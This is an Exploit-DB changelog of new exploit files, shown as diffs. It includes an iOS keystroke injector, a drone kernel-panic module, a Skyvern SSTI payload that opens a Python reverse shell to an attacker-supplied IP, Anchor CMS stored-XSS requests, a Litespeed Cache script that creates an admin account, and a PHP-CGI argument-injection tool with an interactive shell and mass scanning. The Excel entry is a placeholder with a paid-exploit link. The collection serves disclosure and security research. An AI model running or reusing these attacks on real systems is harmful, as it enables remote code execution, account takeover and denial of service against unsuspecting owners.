DB: 2025-06-16

15 changes to exploits/shellcodes/ghdb

AirKeyboard iOS App 1.0.5 - Remote Input Injection

Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

Microsoft Excel Use After Free - Local Code Execution

PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

WebDAV Windows 10 - Remote Code Execution (RCE)

Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

exploits/ios/remote/52333.py

@@ -0,0 +1,61 @@
+# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
+# Date: 2025-06-13
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://airkeyboardapp.com
+# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
+# Version: Version 1.0.5
+# Tested on: iOS 18.5 with AirKeyboard app
+
+
+'''
+Description:
+  The AirKeyboard iOS application exposes a WebSocket server on port 8888
+which accepts arbitrary input injection messages from any client.
+  No authentication or pairing process is required. This allows any
+attacker to type arbitrary keystrokes directly into the victim’s iOS device
+  in real-time without user interaction, resulting in full remote input
+control.
+'''
+
+import websocket
+import json
+import time
+
+target_ip = "192.168.8.101"
+ws_url = f"ws://{target_ip}:8888"
+text = "i'm hacker i can write on your keyboard :)"
+
+keystroke_payload = {
+    "type": 1,
+    "text": f"{text}",
+    "mode": 0,
+    "shiftKey": True,
+    "selectionStart": 1,
+    "selectionEnd": 1
+}
+
+def send_payload(ws):
+    print("[+] Sending remote keystroke...")
+    ws.send(json.dumps(keystroke_payload))
+    time.sleep(1)
+    ws.close()
+
+def on_open(ws):
+    send_payload(ws)
+
+def on_error(ws, error):
+    print(f"[!] Error: {error}")
+
+def on_close(ws, close_status_code, close_msg):
+    print("[*] Connection closed")
+
+def exploit():
+    print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
+    ws = websocket.WebSocketApp(ws_url,
+                                 on_open=on_open,
+                                 on_error=on_error,
+                                 on_close=on_close)
+    ws.run_forever()
+
+if __name__ == "__main__":
+    exploit()

exploits/multiple/local/52329.py

@@ -0,0 +1,223 @@
+#!/usr/bin/env python3
+# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
+# Author: Mohammed Idrees Banyamer
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-10
+# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M
+# CVE: CVE-2025-37928
+# Type: Local Privilege Escalation / Kernel Panic
+# Platform: Linux-based drone OS (Parrot and DJI variants)
+# Author Country: Jordan
+# CVSS v3.1 Score: 7.3 (Important)
+# Weakness: CWE-284: Improper Access Control
+# Attack Vector: Local
+# User Interaction: None
+# Scope: Unchanged
+# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)
+# Exploit Code Maturity: Proof of Concept
+# Remediation Level: Official Fix Available
+#
+# Description:
+# This PoC triggers a kernel panic by calling schedule() inside an atomic context,
+# exploiting CVE-2025-37928 present in certain Linux kernels running on
+# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.
+#
+# Steps of exploitation:
+# 1. Check if running as root.
+# 2. Verify kernel version vulnerability.
+# 3. Detect drone type from system files.
+# 4. Build and load vulnerable kernel module.
+# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.
+#
+# Affected Drone Versions:
+# - Parrot QRD
+# - Parrot Alpha-M (DT)
+# - DJI QRD
+# - DJI Alpha-M (DT)
+#
+# ------------------------------------------------------------------------------
+#  Usage:
+#   sudo python3 cve_2025_37928_tool.py [OPTIONS]
+#
+#  Options:
+#   --dry-run         Run detection & build only (no module loading)
+#   --force           Force exploit even if kernel not detected as vulnerable
+#   --cleanup-only    Remove the kernel module without triggering panic
+#   --verbose         Enable detailed logging and debug output
+#   --help            Show usage information
+#
+#  Examples:
+#   sudo python3 cve_2025_37928_tool.py --dry-run
+#   sudo python3 cve_2025_37928_tool.py
+#   sudo python3 cve_2025_37928_tool.py --force
+#   sudo python3 cve_2025_37928_tool.py --cleanup-only
+#
+#  Warning:
+#   This PoC causes an immediate kernel panic.
+#   Use it ONLY in isolated and controlled environments (e.g., lab tests).
+# ------------------------------------------------------------------------------
+
+import os
+import sys
+import subprocess
+import tempfile
+import argparse
+import shutil
+import platform
+
+MODULE_NAME = "cve_2025_37928_poc"
+C_FILENAME = MODULE_NAME + ".c"
+KO_FILENAME = MODULE_NAME + ".ko"
+
+KERNEL_MODULE_CODE = r'''
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/interrupt.h>
+#include <linux/sched.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("PoC Author");
+MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic");
+
+static void trigger_panic_tasklet(unsigned long data)
+{
+    pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
+    schedule(); // This causes kernel panic
+}
+
+DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);
+
+static int __init poc_init(void)
+{
+    pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n");
+    tasklet_schedule(&my_tasklet);
+    return 0;
+}
+
+static void __exit poc_exit(void)
+{
+    tasklet_kill(&my_tasklet);
+    pr_info("[CVE-2025-37928] PoC module unloaded\n");
+}
+
+module_init(poc_init);
+module_exit(poc_exit);
+'''
+
+MAKEFILE_CONTENT = f'''
+obj-m += {MODULE_NAME}.o
+
+all:
+\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+'''
+
+def check_root():
+    if os.geteuid() != 0:
+        print("[-] Must be run as root.")
+        sys.exit(1)
+
+def detect_kernel():
+    version = platform.release()
+    vulnerable_versions = ["5.10", "5.15", "6.0"]
+    vulnerable = any(v in version for v in vulnerable_versions)
+    print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}")
+    return vulnerable
+
+def detect_drone_type():
+    print("[*] Detecting drone type...")
+    files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"]
+    found = []
+    for path in files:
+        if os.path.exists(path):
+            try:
+                with open(path, "r") as f:
+                    content = f.read().strip()
+                    if any(x in content for x in ["Parrot", "DJI"]):
+                        found.append(content)
+            except:
+                continue
+    if found:
+        for d in found:
+            print(f"  [i] Found: {d}")
+    else:
+        print("  [!] No drone ID found.")
+    return found
+
+def write_module(tempdir):
+    c_path = os.path.join(tempdir, C_FILENAME)
+    makefile_path = os.path.join(tempdir, "Makefile")
+    with open(c_path, "w") as f:
+        f.write(KERNEL_MODULE_CODE)
+    with open(makefile_path, "w") as f:
+        f.write(MAKEFILE_CONTENT)
+    return c_path
+
+def build_module(tempdir):
+    print("[*] Building module...")
+    result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True)
+    if result.returncode != 0:
+        print("[-] Build failed:\n", result.stderr)
+        sys.exit(1)
+    print("[+] Build successful.")
+    return os.path.join(tempdir, KO_FILENAME)
+
+def load_module(ko_path):
+    print("[*] Loading kernel module...")
+    result = subprocess.run(["insmod", ko_path], capture_output=True, text=True)
+    if result.returncode != 0:
+        print("[-] insmod failed:\n", result.stderr)
+        sys.exit(1)
+    print("[!] Module loaded. Kernel panic should occur if vulnerable.")
+
+def unload_module():
+    print("[*] Attempting to remove module...")
+    subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL)
+    print("[+] Module removal attempted.")
+
+def clean_build(tempdir):
+    subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes")
+    parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation")
+    parser.add_argument("--force", action="store_true", help="Force execution even if version unknown")
+    parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded")
+
+    args = parser.parse_args()
+    check_root()
+
+    if args.cleanup_only:
+        unload_module()
+        return
+
+    vulnerable = detect_kernel()
+    detect_drone_type()
+
+    if not vulnerable and not args.force:
+        print("[-] Kernel not identified as vulnerable. Use --force to override.")
+        sys.exit(1)
+
+    if args.dry_run:
+        print("[*] Dry run mode. Exiting before exploitation.")
+        return
+
+    with tempfile.TemporaryDirectory() as tempdir:
+        print(f"[*] Working directory: {tempdir}")
+        write_module(tempdir)
+        ko_path = build_module(tempdir)
+
+        try:
+            load_module(ko_path)
+        except KeyboardInterrupt:
+            print("[!] Interrupted. Attempting cleanup...")
+        finally:
+            unload_module()
+            clean_build(tempdir)
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52335.py

@@ -0,0 +1,119 @@
+# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
+# Date: 2025-06-15
+# Exploit Author: Cristian Branet
+# Vendor Homepage: https://www.skyvern.com/
+# Software Link: https://github.com/Skyvern-AI/skyvern
+# Version: < 0.1.85, before commit db856cd
+# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04)
+# CVE : CVE-2025-49619
+# Article: https://cristibtz.github.io/posts/CVE-2025-49619/
+
+'''
+Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
+An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
+which gets rendered server-side, resulting in blind remote code execution via curl.
+'''
+
+import requests, argparse, pyfiglet
+
+parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
+parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)")
+parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
+parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
+parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")
+
+def create_exploit_workflow(url, ip, port, x_api_key):
+    exploit_workflow = {
+    "title": "Exploit",
+    "description": "",
+    "proxy_location": "RESIDENTIAL",
+    "webhook_callback_url": "",
+    "persist_browser_session": False,
+    "model": None,
+    "totp_verification_url": None,
+    "workflow_definition": {
+        "parameters": [],
+        "blocks": [
+            {
+                "label": "block_1",
+                "continue_on_failure": False,
+                "block_type": "task_v2",
+                "prompt": (
+                    "{% for x in ().__class__.__base__.__subclasses__() %}\n"
+                    "  {% if 'warning' in x.__name__ %}\n"
+                    "    {{ x()._module.__builtins__['__import__']('os').popen(\n"
+                    "      \"python3 -c 'import socket,os,pty;\"\n"
+                    "      \"s=socket.socket();\"\n"
+                    f"     \'s.connect((\\\"{ip}\\\",{port}));\'\n"
+                    "      \"os.dup2(s.fileno(),0);\"\n"
+                    "      \"os.dup2(s.fileno(),1);\"\n"
+                    "      \"os.dup2(s.fileno(),2);\"\n"
+                    "      \"pty.spawn(\\\"sh\\\")'\"\n"
+                    "    ).read() }}\n"
+                    "  {% endif %}\n"
+                    "{% endfor %}"
+                ),
+                "url": "",
+                "max_steps": 25,
+                "totp_identifier": None,
+                "totp_verification_url": None
+            }
+        ]
+    },
+    "is_saved_task": False
+    }
+
+    headers = {
+        "Content-Type": "application/json",
+        "X-API-Key": x_api_key
+    }
+    response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)
+
+    if response.status_code == 200:
+        print("[+] Exploit workflow created successfully!")
+    else:
+        print("[-] Failed to create exploit workflow:", response.text)
+        return None
+
+    workflow_permanent_id = response.json().get("workflow_permanent_id")
+
+    print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")
+
+    return workflow_permanent_id
+
+def run_exploit_workflow(url, x_api_key, workflow_permanent_id):
+
+    workflow_data = {
+        "workflow_id": workflow_permanent_id
+    }
+
+    headers = {
+        "Content-Type": "application/json",
+        "X-API-Key": x_api_key
+    }
+    response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)
+
+    if response.status_code == 200:
+        print("[+] Exploit workflow executed successfully!")
+    else:
+        print("[-] Failed to execute exploit workflow:", response.text)
+
+
+if __name__=="__main__":
+
+    print("\n")
+    print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
+    print("Author: Cristian Branet")
+    print("GitHub: github.com/cristibtz")
+    print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
+    print("\n")
+
+    args = parser.parse_args()
+    url = args.url
+    x_api_key = args.x_api_key
+    ip = args.ip
+    port = args.port
+
+    workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)
+
+    run_exploit_workflow(url, x_api_key, workflow_permanent_id)

exploits/php/webapps/52147.NA

@@ -1,39 +0,0 @@
-# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
-# Date: 04/28/2024
-# Exploit Author: Ahmet Ümit BAYRAM
-# Vendor Homepage: https://anchorcms.com/
-# Software Link:
-https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
-# Version: latest
-# Tested on: MacOS
-
-# Log in to Anchor CMS.
-# Click on "Create New Post".
-# Fill in the "Title" and enter the following payload in the field
-immediately below:
-# "><script>alert()</script>
-# Go to the homepage, and you will see the alert!
-
-
-### PoC Request ###
-
-POST /anchor/admin/posts/edit/2 HTTP/1.1
-Host: 127.0.0.1
-User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
-Gecko/20100101 Firefox/124.0
-Accept: */*
-Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate, br
-X-Requested-With: XMLHttpRequest
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 278
-Origin: http://127.0.0.1
-Connection: close
-Referer: http://127.0.0.1/anchor/admin/posts/edit/2
-Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
-anchorcms=hlko7b1dbdpjgn58himf2obht5
-Sec-Fetch-Dest: empty
-Sec-Fetch-Mode: cors
-Sec-Fetch-Site: same-origin
-
-token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false

exploits/php/webapps/52327.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
+# Google Dork: inurl:"/admin/pages/add" "Anchor CMS"
+# Date: 2025-06-08
+# Exploit Author: /bin/neko
+# Vendor Homepage: http://anchorcms.com
+# Software Link: https://github.com/anchorcms/anchor-cms
+# Version: 0.12.7
+# Tested on: Ubuntu 22.04 + Apache2 + PHP 8.1
+# CVE: CVE-2025-46041
+
+# Description:
+Anchor CMS v0.12.7 suffers from a stored Cross-Site Scripting (XSS) vulnerability
+in the `markdown` field of the /admin/pages/add page.
+An authenticated user with page creation privileges can inject arbitrary JavaScript,
+which is stored and executed when the page is viewed.
+
+# Steps to Reproduce:
+1. Login to /admin
+2. Navigate to Pages > Add Page
+3. In the `Markdown` field, insert:
+   <script>alert(document.domain)</script>
+4. Save the page.
+5. View the created page. The script executes.
+
+# Impact:
+- Arbitrary JavaScript execution
+- Potential session hijacking or admin impersonation

exploits/php/webapps/52328.py

@@ -0,0 +1,129 @@
+# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation
+# Date: 2025-06-10
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Country: United Kingdom
+# CVE : CVE-2024-28000
+
+
+import requests
+import random
+import string
+import concurrent.futures
+
+# Configuration
+target_url = 'http://example.com'
+rest_api_endpoint = '/wp-json/wp/v2/users'
+ajax_endpoint = '/wp-admin/admin-ajax.php'
+admin_user_id = '1'
+num_hash_attempts = 1000000
+num_workers = 10
+new_username = 'newadminuser' # Replace with desired username
+new_user_password = 'NewAdminPassword123!' # Replace with a secure password
+
+def mt_srand(seed=None):
+    """
+    Mimics PHP's mt_srand function by setting the seed for random number
+generation.
+    """
+    random.seed(seed)
+
+def mt_rand(min_value=0, max_value=2**32 - 1):
+    """
+    Mimics PHP's mt_rand function by generating a random number within the
+specified range.
+    """
+    return random.randint(min_value, max_value)
+
+def generate_random_string(length=6):
+    """
+    Generates a random string based on the output of mt_rand.
+    """
+    chars = string.ascii_letters + string.digits
+    return ''.join(random.choices(chars, k=length))
+
+def trigger_hash_generation():
+    payload = {
+        'action': 'async_litespeed',
+        'litespeed_type': 'crawler'
+    }
+    try:
+        response = requests.post(f'{target_url}{ajax_endpoint}',
+data=payload)
+        if response.status_code == 200:
+            print('[INFO] Triggered hash generation.')
+        else:
+            print(f'[ERROR] Failed to trigger hash generation - Status
+code: {response.status_code}')
+    except requests.RequestException as e:
+        print(f'[ERROR] AJAX request failed: {e}')
+
+def attempt_hash(hash_value):
+    cookies = {
+        'litespeed_hash': hash_value,
+        'litespeed_role': admin_user_id
+    }
+    try:
+        response = requests.post(f'{target_url}{rest_api_endpoint}',
+cookies=cookies)
+        return response, cookies
+    except requests.RequestException as e:
+        print(f'[ERROR] Request failed: {e}')
+        return None, None
+
+def create_admin_user(cookies):
+    user_data = {
+        'username': new_username,
+        'password': new_user_password,
+        'email': f'{new_username}@example.com',
+        'roles': ['administrator']
+    }
+    try:
+        response = requests.post(f'{target_url}{rest_api_endpoint}',
+cookies=cookies, json=user_data)
+        if response.status_code == 201:
+            print(f'[SUCCESS] New admin user "{new_username}" created
+successfully!')
+        else:
+            print(f'[ERROR] Failed to create admin user - Status code:
+{response.status_code} - Response: {response.text}')
+    except requests.RequestException as e:
+        print(f'[ERROR] User creation request failed: {e}')
+
+def worker():
+    for _ in range(num_hash_attempts // num_workers):
+        random_string = generate_random_string()
+        print(f'[DEBUG] Trying hash: {random_string}')
+
+        response, cookies = attempt_hash(random_string)
+
+        if response is None:
+            continue
+
+        print(f'[DEBUG] Response status code: {response.status_code}')
+        print(f'[DEBUG] Response content: {response.text}')
+
+        if response.status_code == 201:
+            print(f'[SUCCESS] Valid hash found: {random_string}')
+            create_admin_user(cookies)
+            return
+        elif response.status_code == 401:
+            print(f'[FAIL] Invalid hash: {random_string}')
+        else:
+            print(f'[ERROR] Unexpected response for hash: {random_string} -
+Status code: {response.status_code}')
+
+def main():
+    # Seeding the random number generator (mimicking mt_srand)
+    mt_srand()
+
+    trigger_hash_generation()
+
+    with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as
+executor:
+        futures = [executor.submit(worker) for _ in range(num_workers)]
+        concurrent.futures.wait(futures)
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/52331.py

@@ -0,0 +1,296 @@
+#!/usr/bin/env python3
+
+# Exploit Title: PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
+# Date: 2025-06-13
+# Exploit Author: @ibrahimsql
+# Exploit Author's github: https://github.com/yigitsql ( old account banned )
+# Vendor Homepage: https://www.php.net/
+# Software Link: https://www.php.net/downloads
+# Version: PHP < 8.3.4, PHP < 8.2.17, PHP < 8.1.27
+# Tested on: Kali Linux 2024.1
+# CVE: CVE-2024-4577
+# Description:
+# A critical vulnerability in PHP's CGI implementation allows remote attackers to execute
+# arbitrary code through command injection. The vulnerability exists due to improper handling
+# of command-line arguments in PHP CGI, which can be exploited to bypass security restrictions
+# and execute arbitrary commands with the privileges of the web server. This vulnerability
+# affects all PHP versions before 8.3.4, 8.2.17, and 8.1.27.
+#
+# Impact:
+# - Remote Code Execution (RCE)
+# - Information Disclosure
+# - Server Compromise
+#
+# References:
+# - https://nvd.nist.gov/vuln/detail/cve-2024-4577
+# - https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure
+# - https://www.tarlogic.com/blog/cve-2024-4577-critical-vulnerability-php/
+# - https://learn.microsoft.com/en-us/answers/questions/1725847/php-8-3-vulnerability-cve-2024-4577
+# - https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/
+#
+# Requirements: urllib3>=1.26.0, rich, requests>=2.25.0, alive_progress, concurrent.futures
+
+import re
+import sys
+import base64
+import requests
+import argparse
+from rich.console import Console
+from urllib3 import disable_warnings
+from urllib3.exceptions import InsecureRequestWarning
+from alive_progress import alive_bar
+from concurrent.futures import ThreadPoolExecutor, as_completed
+
+disable_warnings(InsecureRequestWarning)
+
+console = Console()
+
+class PHPCGIExploit:
+    """CVE-2024-4577 PHP CGI Argument Injection RCE Exploit"""
+
+    def __init__(self):
+        self.headers = {
+            "Content-Type": "application/x-www-form-urlencoded",
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
+        }
+
+        # Optimized settings for PHP CGI argument injection
+        self.php_settings = [
+            "-d cgi.force_redirect=0",
+            "-d cgi.redirect_status_env=0",
+            "-d fastcgi.impersonate=1",
+            "-d open_basedir=",
+            "-d disable_functions=",
+            "-d auto_prepend_file=php://input",
+            "-d allow_url_include=1",
+            "-d allow_url_fopen=1"
+        ]
+
+        # Soft hyphen character for Windows systems
+        self.soft_hyphen = "%AD"  # 0xAD character
+
+        # Different PHP CGI paths to try
+        self.cgi_paths = [
+            "/php-cgi/php-cgi.exe",
+            "/php/php-cgi.exe",
+            "/cgi-bin/php-cgi.exe",
+            "/php-cgi.exe",
+            "/php.exe",
+            "/php/php.exe"
+        ]
+
+    def ascii_art(self):
+        print("")
+        console.print("[bold red]    ____  _   _ ____       ____  ____ ___[/bold red]")
+        console.print("[bold red]   |  _ \| | | |  _ \     / ___|/ ___|_ _|[/bold red]")
+        console.print("[bold red]   | |_) | |_| | |_) |   | |   | |  _ | |[/bold red]")
+        console.print("[bold red]   |  __/|  _  |  __/    | |___| |_| || |[/bold red]")
+        console.print("[bold red]   |_|   |_| |_|_|        \____|\____|___|[/bold red]")
+        console.print("[bold yellow]          CVE-2024-4577 Exploit[/bold yellow]")
+        console.print("[dim white]        PHP CGI Argument Injection[/dim white]")
+        console.print("[dim cyan]           Developer: @ibrahimsql[/dim cyan]")
+        print("")
+
+    def build_payload_url(self, cgi_path):
+        # Argument injection with soft hyphen
+        settings_str = " ".join(self.php_settings).replace("-", self.soft_hyphen)
+        settings_str = settings_str.replace("=", "%3D").replace(" ", "+")
+        return f"{cgi_path}?{settings_str}"
+
+    def execute_command(self, target, command="whoami", cgi_path=None):
+        """Execute command on target using PHP CGI argument injection"""
+        try:
+            # Create PHP code
+            php_code = f"""<?php
+error_reporting(0);
+echo '[START]';
+system('{command}');
+echo '[END]';
+die();
+?>"""
+
+            # If no CGI path specified, try all paths
+            if cgi_path:
+                paths_to_try = [cgi_path]
+            else:
+                paths_to_try = self.cgi_paths
+
+            for path in paths_to_try:
+                try:
+                    payload_url = self.build_payload_url(path)
+                    full_url = f"{target.rstrip('/')}{payload_url}"
+
+                    response = requests.post(
+                        full_url,
+                        headers=self.headers,
+                        data=php_code,
+                        timeout=10,
+                        verify=False,
+                        allow_redirects=False
+                    )
+
+                    # Check output
+                    if response.status_code == 200:
+                        output_match = re.search(r'\[START\](.*?)\[END\]', response.text, re.DOTALL)
+                        if output_match:
+                            return output_match.group(1).strip(), path
+
+                except requests.exceptions.RequestException:
+                    continue
+
+            return None, None
+
+        except Exception as e:
+            console.print(f"[red][-][/red] Error: {str(e)}")
+            return None, None
+
+    def check_vulnerability(self, target):
+        """Check if target is vulnerable"""
+        console.print(f"[blue][*][/blue] Testing target: {target}")
+
+        # Test with a simple command
+        result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST")
+
+        if result and "CVE-2024-4577-TEST" in result:
+            console.print(f"[green][+][/green] Target is vulnerable! CGI Path: {cgi_path}")
+
+            # Get system information
+            sys_info, _ = self.execute_command(target, "systeminfo", cgi_path)
+            if sys_info:
+                console.print("[green][+][/green] System Information:")
+                console.print(f"[dim]{sys_info[:500]}...[/dim]")  # First 500 characters
+
+            return True, cgi_path
+        else:
+            console.print(f"[red][-][/red] Target is not vulnerable")
+            return False, None
+
+    def interactive_shell(self, target, cgi_path):
+        """Interactive shell session - Simple version"""
+        console.print("[green][+][/green] Interactive shell opened")
+        console.print("[yellow][!][/yellow] Type 'exit' to quit, 'clear' to clear screen")
+
+        while True:
+            try:
+                # Simple input prompt
+                cmd = input("shell> ")
+
+                if cmd.lower() == "exit":
+                    break
+                elif cmd.lower() == "clear":
+                    print("\033[2J\033[H", end="")
+                    continue
+                elif cmd.strip() == "":
+                    continue
+
+                # Execute command
+                result, _ = self.execute_command(target, cmd, cgi_path)
+
+                if result:
+                    print(result)
+                else:
+                    console.print("[red][-][/red] Command execution failed")
+
+            except KeyboardInterrupt:
+                console.print("\n[yellow][!][/yellow] Use 'exit' to quit")
+            except Exception as e:
+                console.print(f"[red][-][/red] Error: {str(e)}")
+
+    def exploit_target(self, target, output_file=None):
+        """Exploit single target"""
+        is_vulnerable, cgi_path = self.check_vulnerability(target)
+
+        if is_vulnerable:
+            # Save results
+            if output_file:
+                with open(output_file, "a") as f:
+                    f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
+
+            # Start interactive shell
+            console.print("[blue][*][/blue] Starting interactive shell...")
+            self.interactive_shell(target, cgi_path)
+        else:
+            if output_file:
+                with open(output_file, "a") as f:
+                    f.write(f"[-] Not vulnerable: {target}\n")
+
+    def scan_multiple_targets(self, targets_file, threads=5, output_file=None):
+        """Scan multiple targets"""
+        try:
+            with open(targets_file, "r") as f:
+                targets = [line.strip() for line in f if line.strip()]
+
+            if not targets:
+                console.print("[red][-][/red] No targets found in file")
+                return
+
+            console.print(f"[blue][*][/blue] Scanning {len(targets)} targets with {threads} threads")
+
+            vulnerable_targets = []
+
+            def scan_target(target):
+                try:
+                    is_vulnerable, cgi_path = self.check_vulnerability(target)
+                    if is_vulnerable:
+                        vulnerable_targets.append((target, cgi_path))
+                        if output_file:
+                            with open(output_file, "a") as f:
+                                f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
+                except Exception as e:
+                    console.print(f"[red][-][/red] Error scanning {target}: {str(e)}")
+
+            with alive_bar(len(targets), title="Scanning", bar="smooth") as bar:
+                with ThreadPoolExecutor(max_workers=threads) as executor:
+                    futures = [executor.submit(scan_target, target) for target in targets]
+                    for future in as_completed(futures):
+                        future.result()
+                        bar()
+
+            # Summary
+            print("")
+            console.print(f"[green][+][/green] Found {len(vulnerable_targets)} vulnerable targets")
+
+            if vulnerable_targets:
+                console.print("\n[bold]Vulnerable Targets:[/bold]")
+                for target, cgi_path in vulnerable_targets:
+                    console.print(f"  [green]•[/green] {target} (CGI: {cgi_path})")
+
+        except FileNotFoundError:
+            console.print(f"[red][-][/red] File not found: {targets_file}")
+        except Exception as e:
+            console.print(f"[red][-][/red] Error: {str(e)}")
+
+def main():
+    """Main function"""
+    exploit = PHPCGIExploit()
+    exploit.ascii_art()
+
+    parser = argparse.ArgumentParser(
+        description="CVE-2024-4577 - PHP CGI Argument Injection RCE Exploit",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  python3 exploit.py -u http://target.com
+  python3 exploit.py -f targets.txt -t 10 -o results.txt
+
+Note: This tool is for educational and authorized testing purposes only.
+        """
+    )
+
+    parser.add_argument("-u", "--url", help="Single target URL")
+    parser.add_argument("-f", "--file", help="File containing target URLs")
+    parser.add_argument("-o", "--output", help="Output file for results")
+    parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads (default: 5)")
+
+    args = parser.parse_args()
+
+    if args.url:
+        exploit.exploit_target(args.url, args.output)
+    elif args.file:
+        exploit.scan_multiple_targets(args.file, args.threads, args.output)
+    else:
+        parser.print_help()
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()

exploits/windows/local/52332.txt

@@ -0,0 +1,67 @@
+# Titles: Microsoft Excel Use After Free - Local Code Execution
+# Author: nu11secur1ty
+# Date: 06/09/2025
+# Vendor: Microsoft
+# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
+# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
+# Versions: MS Excel 2016, MS Office Online Server KB5002699
+# CVE-2025-27751
+
+## Description:
+The attacker can trick any user into opening and executing their code by
+sending a malicious DOCX file via email or a streaming server.
+After the execution of the victim, his machine can be infected or even
+worse than ever; this could be the end of his Windows machine!
+
+STATUS: HIGH-CRITICAL Vulnerability
+
+
+[+]Exploit:
+
+```
+Sub hello()
+Dim Program As String
+Dim TaskID As Double
+On Error Resume Next
+---------------------------------------
+Program = "WRITE YOUR OWN EXPLOIT HERE"
+TaskID = ...YOUR TASK HERE...
+---------------------------------------
+If Err <> 0 Then
+MsgBox "Can't start " & Program
+End If
+End Sub
+```
+
+# Reproduce:
+[href](https://www.youtube.com/watch?v=ArI0ZeChYE4)
+
+# Buy an exploit only:
+[href](https://satoshidisk.com/pay/COb5oS)
+
+# Time spent:
+00:35:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
